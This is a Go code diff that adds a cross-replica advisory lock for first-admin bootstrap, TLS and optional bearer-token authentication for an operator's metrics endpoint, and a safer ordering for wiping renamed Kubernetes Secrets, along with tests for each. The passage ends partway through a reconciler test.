--- a/internal/core/storage/interface.go
+++ b/internal/core/storage/interface.go
@@ -73,6 +73,21 @@ type Storage interface {
 	// SQLite (single instance, no cross-process concern) a process mutex is enough.
 	WithAuditCheckpointLock(ctx context.Context, fn func() error) error
 
+	// WithBootstrapLock serializes BootstrapSystem's whole "is this a fresh
+	// install" check through admin/RBAC/project seeding (auth_bootstrap.go) across
+	// every replica of an HA deployment (ADR-039), mirroring WithAuditCheckpointLock's
+	// mutex+advisory-lock design: an in-process mutex alone only serializes callers
+	// within ONE server, so two different replicas racing POST /system/init could
+	// both observe "not yet initialised" before either's commit is visible to the
+	// other and each independently seed a "first admin" (double-seed / partial-RBAC
+	// corruption). This BLOCKS until the lock is free, same as
+	// WithAuditCheckpointLock: a losing replica must actually re-check under the
+	// lock and observe the winner's now-committed state, not silently skip. On
+	// PostgreSQL it holds a session advisory lock (pg_advisory_lock) for the
+	// duration of fn; on SQLite (single instance, no cross-process concern) a
+	// process mutex is enough.
+	WithBootstrapLock(ctx context.Context, fn func() error) error
+
 	// WithTransaction runs fn inside a single storage transaction: every mutation fn
 	// performs through the provided Storage commits together, or rolls back together if
 	// fn returns an error. The backing store decides the semantics — the local (DB)

--- a/internal/storage/store/entry.go
+++ b/internal/storage/store/entry.go
@@ -189,11 +189,17 @@ type LocalStorage struct {
 	// (ADR-039 HA). A pointer for the same reason as auditChainMu — a transaction-scoped
 	// LocalStorage must share its parent's mutex.
 	auditCheckpointMu *sync.Mutex
+	// bootstrapMu serializes BootstrapSystem's whole check-then-create sequence
+	// within this process (#339/ADR-039 HA). The PostgreSQL advisory lock in
+	// WithBootstrapLock extends this across processes/replicas. A pointer for the
+	// same reason as auditChainMu/auditCheckpointMu — a transaction-scoped
+	// LocalStorage must share its parent's mutex.
+	bootstrapMu *sync.Mutex
 }
 
 // NewLocalStorage creates a LocalStorage backed by the given *gorm.DB.
 func NewLocalStorage(db *gorm.DB) *LocalStorage {
-	return &LocalStorage{db: db, auditChainMu: &sync.Mutex{}, auditCheckpointMu: &sync.Mutex{}}
+	return &LocalStorage{db: db, auditChainMu: &sync.Mutex{}, auditCheckpointMu: &sync.Mutex{}, bootstrapMu: &sync.Mutex{}}
 }
 
 // DB returns the underlying *gorm.DB. Exposed for test helpers that need direct

--- a/internal/storage/store/local_bootstrap_lock.go
+++ b/internal/storage/store/local_bootstrap_lock.go
@@ -1,0 +1,65 @@
+// local_bootstrap_lock.go — serializes BootstrapSystem's first-admin seeding
+// sequence (ADR-039 HA) across every replica.
+//
+// BootstrapSystem's "is this a fresh install" check through admin/RBAC/project
+// seeding was previously guarded only by a KeyorixCore-level sync.Mutex
+// (bootstrapMu), which serializes concurrent callers within ONE server process
+// but does nothing for two different replicas of an HA deployment racing
+// POST /system/init against the same shared database: each replica's mutex
+// only guards its own process, so both can observe "not yet initialised"
+// before either's write is visible to the other and each independently seed a
+// "first admin" — a duplicate-admin race and/or partially corrupted RBAC seed
+// (#core-auth-03).
+package store
+
+import (
+	"context"
+	"fmt"
+)
+
+// bootstrapAdvisoryLockKey is the Postgres advisory-lock key guarding
+// BootstrapSystem's check-then-create sequence across processes. Distinct from
+// auditAdvisoryLockKey and auditCheckpointAdvisoryLockKey — the three critical
+// sections are independent and must not contend with each other.
+const bootstrapAdvisoryLockKey = 0x4B455941_424F4F54 // "KEYABOOT"
+
+// WithBootstrapLock runs fn with BootstrapSystem's check-then-create sequence
+// serialized: a process-level mutex covers the common single-writer self-host
+// topology and SQLite (inherently single-instance — there is no DB-level
+// advisory lock to take); a PostgreSQL session-scoped advisory lock
+// (pg_advisory_lock) extends that across processes/replicas (ADR-039 HA).
+//
+// Like WithAuditCheckpointLock, this BLOCKS until the lock is acquired rather
+// than skipping on contention — a replica that loses the race must actually
+// re-run its "already initialised?" check under the lock and observe the
+// winner's now-committed state, not silently no-op (which would leave its
+// caller waiting on a response that never seeds anything and never reports
+// AlreadyInitialized either).
+func (ls *LocalStorage) WithBootstrapLock(ctx context.Context, fn func() error) error {
+	ls.bootstrapMu.Lock()
+	defer ls.bootstrapMu.Unlock()
+
+	if ls.db.Dialector.Name() != "postgres" {
+		return fn()
+	}
+
+	sqlDB, err := ls.db.DB()
+	if err != nil {
+		return err
+	}
+	conn, err := sqlDB.Conn(ctx)
+	if err != nil {
+		return err
+	}
+	defer func() { _ = conn.Close() }() // returns the conn to the pool (after the unlock below)
+
+	if _, err := conn.ExecContext(ctx, "SELECT pg_advisory_lock($1)", int64(bootstrapAdvisoryLockKey)); err != nil {
+		return fmt.Errorf("failed to acquire bootstrap advisory lock: %w", err)
+	}
+	// Release before the deferred Close so the pooled connection carries no lock.
+	defer func() {
+		_, _ = conn.ExecContext(ctx, "SELECT pg_advisory_unlock($1)", int64(bootstrapAdvisoryLockKey))
+	}()
+
+	return fn()
+}

--- a/internal/storage/store/local_bootstrap_lock_test.go
+++ b/internal/storage/store/local_bootstrap_lock_test.go
@@ -1,0 +1,92 @@
+package store
+
+import (
+	"context"
+	"errors"
+	"sync"
+	"sync/atomic"
+	"testing"
+	"time"
+
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+)
+
+func newBootstrapLockStore(t *testing.T) *LocalStorage {
+	t.Helper()
+	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
+	require.NoError(t, err)
+	return NewLocalStorage(db)
+}
+
+// On SQLite (single instance) fn always runs and its result propagates.
+func TestWithBootstrapLock_SQLiteRunsAndPropagates(t *testing.T) {
+	ls := newBootstrapLockStore(t)
+	ctx := context.Background()
+
+	ran := false
+	err := ls.WithBootstrapLock(ctx, func() error {
+		ran = true
+		return nil
+	})
+	require.NoError(t, err)
+	assert.True(t, ran, "fn executed")
+
+	sentinel := errors.New("boom")
+	err = ls.WithBootstrapLock(ctx, func() error { return sentinel })
+	require.ErrorIs(t, err, sentinel)
+
+	// Not held after returning: a subsequent call still runs.
+	ran = false
+	err = ls.WithBootstrapLock(ctx, func() error {
+		ran = true
+		return nil
+	})
+	require.NoError(t, err)
+	assert.True(t, ran)
+}
+
+// TestWithBootstrapLock_SerializesConcurrentCallers pins the actual mechanism the
+// fix for #core-auth-03 relies on: WithBootstrapLock must provide real mutual
+// exclusion between two concurrent callers on the same LocalStorage instance, not
+// just a documentation promise. A racer that starts second must not enter fn until
+// the first racer's fn has returned and released the lock — this is the exact
+// guarantee BootstrapSystem's check-then-create sequence depends on to avoid two
+// callers both observing "not yet initialised" before either commits.
+func TestWithBootstrapLock_SerializesConcurrentCallers(t *testing.T) {
+	ls := newBootstrapLockStore(t)
+	ctx := context.Background()
+
+	var inside int32
+	var maxConcurrent int32
+	var wg sync.WaitGroup
+	start := make(chan struct{})
+	const racers = 20
+	for i := 0; i < racers; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			<-start
+			_ = ls.WithBootstrapLock(ctx, func() error {
+				cur := atomic.AddInt32(&inside, 1)
+				for {
+					prev := atomic.LoadInt32(&maxConcurrent)
+					if cur <= prev || atomic.CompareAndSwapInt32(&maxConcurrent, prev, cur) {
+						break
+					}
+				}
+				// Hold the "critical section" briefly so any missing exclusion
+				// would show up as inside > 1 with high probability.
+				time.Sleep(2 * time.Millisecond)
+				atomic.AddInt32(&inside, -1)
+				return nil
+			})
+		}()
+	}
+	close(start)
+	wg.Wait()
+
+	assert.Equal(t, int32(1), maxConcurrent, "WithBootstrapLock must never let two callers run fn concurrently")
+}

--- a/internal/storage/store/local_rbac.go
+++ b/internal/storage/store/local_rbac.go
@@ -423,7 +423,7 @@ func (ls *LocalStorage) ListGlobalAdminAssignmentsForUpdate(ctx context.Context,
 // when the caller drove both calls under its own WithTransaction.
 func (ls *LocalStorage) RemoveGlobalAdminRoleGuarded(ctx context.Context, userID, roleID uint, adminRoleIDs []uint) error {
 	return ls.db.WithContext(ctx).Transaction(func(tx *gorm.DB) error {
-		txStorage := &LocalStorage{db: tx, auditChainMu: ls.auditChainMu, auditCheckpointMu: ls.auditCheckpointMu}
+		txStorage := &LocalStorage{db: tx, auditChainMu: ls.auditChainMu, auditCheckpointMu: ls.auditCheckpointMu, bootstrapMu: ls.bootstrapMu}
 		assignments, err := txStorage.ListGlobalAdminAssignmentsForUpdate(ctx, adminRoleIDs)
 		if err != nil {
 			return fmt.Errorf("%s: %w", i18n.T("ErrorRetrievalFailed", nil), err)

--- a/internal/storage/store/local_transaction.go
+++ b/internal/storage/store/local_transaction.go
@@ -11,11 +11,11 @@ import (
 // WithTransaction runs fn inside a single GORM transaction. fn receives a
 // transaction-scoped LocalStorage: every mutation it makes is committed together when
 // fn returns nil, and rolled back together if fn returns an error (or panics). The
-// transaction-scoped store shares the parent's audit-chain and audit-checkpoint mutexes
-// so an audit append or checkpoint write inside the transaction still serializes
-// correctly (ADR-029).
+// transaction-scoped store shares the parent's audit-chain, audit-checkpoint, and
+// bootstrap mutexes so an audit append, checkpoint write, or bootstrap seed inside
+// the transaction still serializes correctly (ADR-029/#339).
 func (ls *LocalStorage) WithTransaction(ctx context.Context, fn func(storage.Storage) error) error {
 	return ls.db.WithContext(ctx).Transaction(func(tx *gorm.DB) error {
-		return fn(&LocalStorage{db: tx, auditChainMu: ls.auditChainMu, auditCheckpointMu: ls.auditCheckpointMu})
+		return fn(&LocalStorage{db: tx, auditChainMu: ls.auditChainMu, auditCheckpointMu: ls.auditCheckpointMu, bootstrapMu: ls.bootstrapMu})
 	})
 }

--- a/internal/storage/store/remote_bootstrap_lock.go
+++ b/internal/storage/store/remote_bootstrap_lock.go
@@ -1,0 +1,13 @@
+package store
+
+import "context"
+
+// WithBootstrapLock is server-side only — BootstrapSystem always runs against
+// LocalStorage inside the server process (the HTTP POST /system/init handler is
+// its only caller); nothing calls it against RemoteStorage. A remote caller
+// reaching this would get no real cross-process guarantee anyway (there is no
+// shared advisory lock to take over HTTP), so this fails closed rather than
+// silently running fn unserialized.
+func (rs *RemoteStorage) WithBootstrapLock(_ context.Context, _ func() error) error {
+	return remoteUnsupported("WithBootstrapLock")
+}

--- a/internal/storage/store/remote_bootstrap_lock_completeness_test.go
+++ b/internal/storage/store/remote_bootstrap_lock_completeness_test.go
@@ -1,0 +1,8 @@
+package store
+
+func init() {
+	addRemoteUnsupported(map[string]remoteUnsupportedEntry{
+		"WithBootstrapLock": {statusIntentional,
+			"#core-auth-03: BootstrapSystem always runs against LocalStorage inside the server process (its only caller is the HTTP POST /system/init handler) — nothing calls it against RemoteStorage, and a remote caller would get no real cross-process guarantee anyway (no shared advisory lock to take over HTTP), same reasoning as WithAuditCheckpointLock"},
+	})
+}

--- a/operator/cmd/main.go
+++ b/operator/cmd/main.go
@@ -3,16 +3,20 @@
 package main
 
 import (
+	"crypto/subtle"
 	"flag"
 	"fmt"
+	"net/http"
 	"os"
 	"strings"
 
+	"github.com/go-logr/logr"
 	corev1 "k8s.io/api/core/v1"
 	"k8s.io/apimachinery/pkg/labels"
 	"k8s.io/apimachinery/pkg/runtime"
 	utilruntime "k8s.io/apimachinery/pkg/util/runtime"
 	clientgoscheme "k8s.io/client-go/kubernetes/scheme"
+	"k8s.io/client-go/rest"
 	ctrl "sigs.k8s.io/controller-runtime"
 	"sigs.k8s.io/controller-runtime/pkg/cache"
 	"sigs.k8s.io/controller-runtime/pkg/client"
@@ -150,11 +154,84 @@ func secretCacheOptions(s namespaceScope) (cache.Options, client.Options) {
 	}
 }
 
+// metricsFilterProvider builds a controller-runtime metrics FilterProvider (the framework's
+// own extension point for gating its metrics server, wired in via ctrl.Options.Metrics.
+// FilterProvider below) that requires a matching "Authorization: Bearer <token>" header when
+// token is non-empty, and mirrors server/http/router.go's own MetricsToken gate on the main
+// Keyorix server's /metrics endpoint (constant-time comparison, same header shape) so both
+// binaries in this repo authenticate their metrics endpoints the same way.
+//
+// controller-runtime also ships its own kube-rbac-proxy-style filter,
+// metrics/filters.WithAuthenticationAndAuthorization, which authenticates via the
+// apiserver's TokenReview/SubjectAccessReview APIs instead of a static token. It was
+// deliberately NOT used here: it requires a new k8s.io/apiserver dependency, and --
+// more importantly -- TokenReview/SubjectAccessReview are cluster-scoped, non-namespaced
+// resources, so granting them needs a ClusterRoleBinding specifically. That conflicts with
+// ADR-076 (see resolveScope/secretCacheOptions above and deploy/helm/keyorix-operator's own
+// rbac.yaml comment): this operator's default, and most common, deployment shape binds its
+// ClusterRole via a namespace-scoped RoleBinding, which cannot grant a cluster-scoped
+// permission at all -- every metrics scrape would 403 out of the box for that default
+// shape. A static bearer token has no such conflict and matches this repo's own existing
+// convention for the identical problem on the main server.
+//
+// When token is empty the endpoint is left unauthenticated -- matching the main server's own
+// documented default (see router.go: "When unset, the endpoint is unauthenticated ... keep
+// it inside your perimeter") -- so this is opt-in, not a breaking change for existing
+// deployments that don't set one. TLS (SecureServing, wired in main below) is unconditional
+// regardless of whether a token is configured: controller-runtime auto-generates a
+// self-signed certificate for it when no CertDir/TLSOpts are supplied (matching
+// kube-controller-manager's own documented use of self-signed certs for this exact purpose),
+// so it costs nothing and needs no operator-supplied config to close the "no TLS" half of
+// this finding.
+// newMetricsOptions builds the metricsserver.Options passed to ctrl.Options.Metrics in main
+// below. Split out (mirroring secretCacheOptions above) so a test can pin that
+// SecureServing/FilterProvider are actually wired in, not just that metricsFilterProvider
+// behaves correctly in isolation.
+func newMetricsOptions(metricsAddr, bearerToken string) metricsserver.Options {
+	return metricsserver.Options{
+		BindAddress: metricsAddr,
+		// SecureServing serves metrics over TLS unconditionally: with no CertDir/TLSOpts
+		// configured, controller-runtime auto-generates a self-signed certificate (see its
+		// own doc comment on Options.SecureServing) -- no operator-supplied cert, key, or new
+		// dependency needed, so there's no reason not to always have it on.
+		SecureServing: true,
+		// FilterProvider gates access behind an optional static bearer token -- see
+		// metricsFilterProvider's own doc comment for why this, and not controller-runtime's
+		// built-in TokenReview/SubjectAccessReview filter
+		// (metrics/filters.WithAuthenticationAndAuthorization), was chosen.
+		FilterProvider: metricsFilterProvider(bearerToken),
+	}
+}
+
+func metricsFilterProvider(token string) func(*rest.Config, *http.Client) (metricsserver.Filter, error) {
+	return func(*rest.Config, *http.Client) (metricsserver.Filter, error) {
+		return func(_ logr.Logger, handler http.Handler) (http.Handler, error) {
+			if token == "" {
+				return handler, nil
+			}
+			return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				auth := r.Header.Get("Authorization")
+				if len(auth) < 8 || auth[:7] != "Bearer " || subtle.ConstantTimeCompare([]byte(auth[7:]), []byte(token)) != 1 {
+					http.Error(w, "Unauthorized", http.StatusUnauthorized)
+					return
+				}
+				handler.ServeHTTP(w, r)
+			}), nil
+		}, nil
+	}
+}
+
 func main() {
-	var metricsAddr, probeAddr, allowedServers, watchNamespaces string
+	var metricsAddr, probeAddr, allowedServers, watchNamespaces, metricsBearerToken string
 	var enableLeaderElection, allNamespaces bool
 	flag.StringVar(&metricsAddr, "metrics-bind-address", ":8080", "address the metric endpoint binds to")
 	flag.StringVar(&probeAddr, "health-probe-bind-address", ":8081", "address the probe endpoint binds to")
+	flag.StringVar(&metricsBearerToken, "metrics-bearer-token", os.Getenv("KEYORIX_METRICS_TOKEN"),
+		"OPTIONAL bearer token required on the metrics endpoint's Authorization header (e.g. by a Prometheus scrape "+
+			"config's authorization.credentials). The metrics endpoint is always served over TLS (a self-signed "+
+			"certificate is generated automatically) regardless of this flag; when this flag is unset the endpoint "+
+			"itself is left unauthenticated -- matching the main Keyorix server's own MetricsToken default -- so set "+
+			"it, or restrict network access with a NetworkPolicy, for internet-reachable or multi-tenant clusters.")
 	flag.BoolVar(&enableLeaderElection, "leader-elect", false,
 		"enable leader election for controller manager (run a single active replica)")
 	flag.StringVar(&allowedServers, "allowed-servers", os.Getenv("KEYORIX_ALLOWED_SERVERS"),
@@ -186,10 +263,15 @@ func main() {
 		setupLog.Info("restricting watched namespaces", "namespaces", scope.namespaces)
 	}
 
+	if metricsBearerToken == "" {
+		setupLog.Info("WARNING: -metrics-bearer-token is not set; the metrics endpoint is reachable over TLS but " +
+			"without authentication -- set it or restrict network access via a NetworkPolicy")
+	}
+
 	secretCache, secretClient := secretCacheOptions(scope)
 	mgr, err := ctrl.NewManager(ctrl.GetConfigOrDie(), ctrl.Options{
 		Scheme:                 scheme,
-		Metrics:                metricsserver.Options{BindAddress: metricsAddr},
+		Metrics:                newMetricsOptions(metricsAddr, metricsBearerToken),
 		HealthProbeBindAddress: probeAddr,
 		LeaderElection:         enableLeaderElection,
 		LeaderElectionID:       "keyorix-operator.secrets.keyorix.io",

--- a/operator/cmd/main_test.go
+++ b/operator/cmd/main_test.go
@@ -1,6 +1,8 @@
 package main
 
 import (
+	"net/http"
+	"net/http/httptest"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
@@ -8,6 +10,7 @@ import (
 	corev1 "k8s.io/api/core/v1"
 	"k8s.io/apimachinery/pkg/labels"
 	"sigs.k8s.io/controller-runtime/pkg/cache"
+	"sigs.k8s.io/controller-runtime/pkg/log"
 
 	"github.com/keyorixhq/keyorix/operator/internal/controller"
 )
@@ -170,4 +173,91 @@ func TestResolveScope_AllNamespacesSetIgnoresPodNamespace(t *testing.T) {
 	require.NoError(t, err)
 	assert.True(t, scope.allNamespaces)
 	assert.Empty(t, scope.namespaces)
+}
+
+// TestNewMetricsOptions_AlwaysSecureServing pins the fix for finding operator-keyorix.json#1:
+// the metrics server's TLS (SecureServing) must be on unconditionally -- not just when an
+// operator remembers to opt in -- and a FilterProvider must always be wired in (its own
+// behavior, pass-through vs. token-gated, is pinned separately by
+// TestMetricsFilterProvider_*). This exercises the exact function main() calls to build
+// ctrl.Options.Metrics, not a reimplementation of it.
+func TestNewMetricsOptions_AlwaysSecureServing(t *testing.T) {
+	for _, token := range []string{"", "s3cr3t"} {
+		opts := newMetricsOptions(":8080", token)
+		assert.True(t, opts.SecureServing, "metrics server must always serve over TLS, token=%q", token)
+		assert.NotNil(t, opts.FilterProvider, "metrics server must always have a FilterProvider wired in, token=%q", token)
+	}
+}
+
+// filterFromProvider runs a metricsFilterProvider-shaped FilterProvider end to end (nil
+// rest.Config/http.Client, since this implementation ignores both) to get the http.Handler
+// it produces around a stub inner handler, for the two tests below to drive with real HTTP
+// requests.
+func filterFromProvider(t *testing.T, token string, inner http.Handler) http.Handler {
+	t.Helper()
+	provider := metricsFilterProvider(token)
+	filter, err := provider(nil, nil)
+	require.NoError(t, err)
+	wrapped, err := filter(log.Log, inner)
+	require.NoError(t, err)
+	return wrapped
+}
+
+// TestMetricsFilterProvider_EmptyTokenPassesThrough pins the documented, non-breaking
+// default: with no -metrics-bearer-token configured, the metrics endpoint stays reachable
+// without an Authorization header (TLS via SecureServing is still unconditional) --
+// matching the main Keyorix server's own MetricsToken default.
+func TestMetricsFilterProvider_EmptyTokenPassesThrough(t *testing.T) {
+	inner := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
+	handler := filterFromProvider(t, "", inner)
+
+	rr := httptest.NewRecorder()
+	handler.ServeHTTP(rr, httptest.NewRequest(http.MethodGet, "/metrics", nil))
+	assert.Equal(t, http.StatusOK, rr.Code, "an empty token must leave the endpoint unauthenticated")
+}
+
+// TestMetricsFilterProvider_RequiresMatchingBearerToken pins the actual fix: once
+// -metrics-bearer-token is set, only a request carrying the exact matching
+// "Authorization: Bearer <token>" header reaches the real metrics handler -- no header, the
+// wrong token, and a malformed header must all be rejected with 401.
+func TestMetricsFilterProvider_RequiresMatchingBearerToken(t *testing.T) {
+	const token = "s3cr3t-metrics-token"
+	reached := false
+	inner := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		reached = true
+		w.WriteHeader(http.StatusOK)
+	})
+	handler := filterFromProvider(t, token, inner)
+
+	cases := map[string]string{
+		"no header":       "",
+		"wrong token":     "Bearer not-the-token",
+		"malformed":       token, // missing the "Bearer " prefix entirely
+		"wrong scheme":    "Basic " + token,
+		"empty bearer":    "Bearer ",
+		"case-mismatched": "bearer " + token, // lowercase scheme must not match
+	}
+	for name, header := range cases {
+		t.Run(name, func(t *testing.T) {
+			reached = false
+			req := httptest.NewRequest(http.MethodGet, "/metrics", nil)
+			if header != "" {
+				req.Header.Set("Authorization", header)
+			}
+			rr := httptest.NewRecorder()
+			handler.ServeHTTP(rr, req)
+			assert.Equal(t, http.StatusUnauthorized, rr.Code, "case %q must be rejected", name)
+			assert.False(t, reached, "case %q must never reach the real metrics handler", name)
+		})
+	}
+
+	t.Run("matching token", func(t *testing.T) {
+		reached = false
+		req := httptest.NewRequest(http.MethodGet, "/metrics", nil)
+		req.Header.Set("Authorization", "Bearer "+token)
+		rr := httptest.NewRecorder()
+		handler.ServeHTTP(rr, req)
+		assert.Equal(t, http.StatusOK, rr.Code)
+		assert.True(t, reached, "a matching bearer token must reach the real metrics handler")
+	})
 }

--- a/operator/go.mod
+++ b/operator/go.mod
@@ -3,6 +3,7 @@ module github.com/keyorixhq/keyorix/operator
 go 1.26.6
 
 require (
+	github.com/go-logr/logr v1.4.3
 	github.com/stretchr/testify v1.11.1
 	k8s.io/api v0.36.3
 	k8s.io/apimachinery v0.36.3
@@ -19,7 +20,6 @@ require (
 	github.com/evanphx/json-patch/v5 v5.9.11 // indirect
 	github.com/fsnotify/fsnotify v1.9.0 // indirect
 	github.com/fxamacker/cbor/v2 v2.9.0 // indirect
-	github.com/go-logr/logr v1.4.3 // indirect
 	github.com/go-logr/zapr v1.3.0 // indirect
 	github.com/go-openapi/jsonpointer v0.21.0 // indirect
 	github.com/go-openapi/jsonreference v0.20.2 // indirect

--- a/operator/internal/controller/keyorixsecret_controller.go
+++ b/operator/internal/controller/keyorixsecret_controller.go
@@ -220,29 +220,6 @@ func (r *KeyorixSecretReconciler) Reconcile(ctx context.Context, req ctrl.Reques
 		secretName = ks.Name
 	}
 
-	// spec.target.name is mutable — if it changed since the last successful sync, the
-	// Secret materialised under the OLD name is now orphaned: no later reconcile ever
-	// revisits it by name again (Reconcile only ever looks at the CURRENT secretName),
-	// so it would otherwise sit in the cluster forever with its last-synced, possibly
-	// since-rotated, plaintext value, still owned by this (now-repurposed) CR, mountable
-	// by any workload with ordinary Secret-read RBAC in the namespace. Wipe it BEFORE
-	// doing anything else this reconcile, using the same ownership-and-label-checked
-	// wipeTargetSecret used for the confirmed-gone path below — it's a no-op if nothing
-	// exists under the old name, or if this is the CR's first-ever reconcile
-	// (LastTargetName is unset).
-	//
-	// If the wipe itself fails, orphanWipeErr is threaded through to succeed() below:
-	// status.LastTargetName is deliberately NOT advanced to the new name in that case,
-	// so the next reconcile retries the orphan wipe instead of forgetting about it.
-	var orphanWipeErr error
-	if ks.Status.LastTargetName != "" && ks.Status.LastTargetName != secretName {
-		if wipeErr := r.wipeTargetSecret(ctx, &ks, ks.Status.LastTargetName); wipeErr != nil {
-			orphanWipeErr = wipeErr
-			logger.Error(wipeErr, "failed to wipe orphaned target Secret after spec.target.name changed",
-				"oldTargetName", ks.Status.LastTargetName, "newTargetName", secretName)
-		}
-	}
-
 	desired, err := r.buildDesired(ctx, &ks)
 	if err != nil {
 		logger.Error(err, "failed to assemble secret data")
@@ -265,7 +242,7 @@ func (r *KeyorixSecretReconciler) Reconcile(ctx context.Context, req ctrl.Reques
 			// status reason so it's clear from .status which of the two happened.
 			return r.wipeAndFailGone(ctx, &ks, secretName, "UpstreamAccessRevoked", err)
 		default:
-			return r.fail(ctx, &ks, err, orphanWipeErr)
+			return r.fail(ctx, &ks, err)
 		}
 	}
 
@@ -273,7 +250,43 @@ func (r *KeyorixSecretReconciler) Reconcile(ctx context.Context, req ctrl.Reques
 
 	if err := r.applySecret(ctx, &ks, secretName, desired); err != nil {
 		logger.Error(err, "failed to apply target Secret")
-		return r.fail(ctx, &ks, err, orphanWipeErr)
+		return r.fail(ctx, &ks, err)
+	}
+
+	// spec.target.name is mutable — if it changed since the last successful sync, the
+	// Secret materialised under the OLD name is now orphaned: no later reconcile ever
+	// revisits it by name again (Reconcile only ever looks at the CURRENT secretName),
+	// so it would otherwise sit in the cluster forever with its last-synced, possibly
+	// since-rotated, plaintext value, still owned by this (now-repurposed) CR, mountable
+	// by any workload with ordinary Secret-read RBAC in the namespace.
+	//
+	// Wipe it only now, AFTER the NEW-named target Secret above has been confirmed built
+	// and applied successfully — never before. Wiping the OLD Secret first (as this used
+	// to do) turned a rename that then failed to sync (a typo'd ref, a revoked upstream
+	// token, a transient outage) into a full availability outage: the old Secret gone,
+	// the new one never created, so every workload mounting the old name lost it with no
+	// rollback. Deferring the wipe to last means the worst case is instead a brief window
+	// where BOTH the old- and new-named Secrets exist at once, which is harmless: they're
+	// two independently-named Secrets (a single owning CR can own any number of objects
+	// via OwnerReference — there's no one-child invariant to violate), applySecret above
+	// already refuses to adopt/overwrite anything it doesn't manage, and wipeTargetSecret
+	// below only ever touches a Secret this same CR actually controls. It's a no-op if
+	// nothing exists under the old name, or if this is the CR's first-ever reconcile
+	// (LastTargetName is unset).
+	//
+	// If the wipe itself fails, orphanWipeErr is threaded through to succeed() below:
+	// status.LastTargetName is deliberately NOT advanced to the new name in that case,
+	// so the next reconcile retries the orphan wipe instead of forgetting about it. Note
+	// this can no longer coincide with a fail() call in the same reconcile — by the time
+	// the orphan wipe runs, the new target's own sync has already succeeded — so unlike
+	// fail(), succeed() is the only place orphanWipeErr is ever threaded through.
+	var orphanWipeErr error
+	if ks.Status.LastTargetName != "" && ks.Status.LastTargetName != secretName {
+		if wipeErr := r.wipeTargetSecret(ctx, &ks, ks.Status.LastTargetName); wipeErr != nil {
+			orphanWipeErr = wipeErr
+			logger.Error(wipeErr, "failed to wipe orphaned target Secret after spec.target.name changed",
+				"oldTargetName", ks.Status.LastTargetName, "newTargetName", secretName)
+		}
 	}
 
 	if err := r.succeed(ctx, &ks, hash, secretName, orphanWipeErr); err != nil {
@@ -411,23 +424,19 @@ const (
 	tokenSecretValue = "true"
 )
 
-// fail records a SyncError on the Ready condition and requeues with backoff.
-// fail records an ordinary sync failure. orphanWipeErr, when non-nil, means
-// this SAME reconcile also detected a spec.target.name change and failed to
-// wipe the Secret orphaned under the old name (see Reconcile's orphanWipeErr
-// doc) — #G54: before this, that failure was silently dropped whenever the
-// reconcile ALSO failed later (buildDesired/applySecret), so .status would
-// show only the later failure with no indication a stale, possibly
-// revoked/rotated Secret is still sitting in the cluster under the old name,
-// mountable by any workload with ordinary Secret-read RBAC. Mirrors
-// failGone's identical "WipeFailed" reason/message augmentation.
-func (r *KeyorixSecretReconciler) fail(ctx context.Context, ks *secretsv1alpha1.KeyorixSecret, cause, orphanWipeErr error) (ctrl.Result, error) {
-	reason, msg := "SyncError", cause.Error()
-	if orphanWipeErr != nil {
-		reason += "OrphanWipeFailed"
-		msg = fmt.Sprintf("%s — additionally, wiping the Secret orphaned by a spec.target.name change failed, it may still contain stale/rotated data under the old name: %v", cause.Error(), orphanWipeErr)
-	}
-	r.setReady(ks, metav1.ConditionFalse, reason, msg)
+// fail records an ordinary sync failure (SyncError) on the Ready condition and requeues
+// with backoff.
+//
+// This intentionally does NOT take an orphanWipeErr the way succeed() does: the
+// spec.target.name orphan-wipe (see Reconcile) now runs only AFTER buildDesired and
+// applySecret have already succeeded, so a call to fail() — which only ever happens
+// BEFORE that point, when buildDesired or applySecret itself errors — can never
+// coincide with an orphan-wipe attempt in the same reconcile. An earlier version of this
+// function did carry a same-reconcile orphanWipeErr (#G54), back when the orphan wipe
+// ran first and could fail independently of a later buildDesired/applySecret failure;
+// reordering the wipe to run last removed that combination entirely.
+func (r *KeyorixSecretReconciler) fail(ctx context.Context, ks *secretsv1alpha1.KeyorixSecret, cause error) (ctrl.Result, error) {
+	r.setReady(ks, metav1.ConditionFalse, "SyncError", cause.Error())
 	if err := r.Status().Update(ctx, ks); err != nil {
 		return ctrl.Result{}, err
 	}

--- a/operator/internal/controller/keyorixsecret_controller_test.go
+++ b/operator/internal/controller/keyorixsecret_controller_test.go
@@ -514,60 +514,149 @@ func TestReconcile_RetargetWipeFailureKeepsOldLastTargetNameAndWarns(t *testing.
 		"a blocked orphan wipe must be visible in the Ready message, not just logged")
 }
 
-// TestReconcile_OrphanWipeFailureSurfacedAlongsideLaterSyncFailure is #G54:
-// before the fix, orphanWipeErr was captured but then silently dropped
-// whenever the SAME reconcile also failed later (buildDesired or
-// applySecret) — fail() had no way to carry it. An operator reading .status
-// after a reconcile that hit BOTH failures would see only the later one,
-// with no indication a stale Secret is still sitting in the cluster under
-// the old target name.
-func TestReconcile_OrphanWipeFailureSurfacedAlongsideLaterSyncFailure(t *testing.T) {
+// TestReconcile_RetargetSyncFailureLeavesOldSecretInPlace is the regression test for the
+// fix to the "delete-then-create" rename bug: a spec.target.name rename used to wipe the
+// Secret materialised under the OLD name UNCONDITIONALLY, before buildDesired/applySecret
+// had confirmed the NEW-named Secret could actually be synced. If that later sync then
+// failed (a bad ref, a revoked token, a transient upstream outage — anything), NEITHER
+// Secret was left in the cluster: the old one was already gone, and the new one never got
+// created — a self-inflicted availability outage for every workload mounting the old
+// name. The fix reorders Reconcile to build-and-apply the NEW Secret FIRST and only wipe
+// the OLD one after that succeeds, so a failed rename now leaves the OLD (still-working)
+// Secret in place instead. This pins that: with the new target's own fetch made to fail,
+// the OLD Secret must survive the failed reconcile untouched, and the NEW Secret must
+// never have been created.
+func TestReconcile_RetargetSyncFailureLeavesOldSecretInPlace(t *testing.T) {
 	ks := ksFixture()
 	fetcher := &fakeFetcher{values: map[string][]byte{
 		"app/production/db-password": []byte("p4ss"),
 		"app/production/api-key":     []byte("k3y"),
 	}}
-	s := testScheme(t)
-	inner := fake.NewClientBuilder().
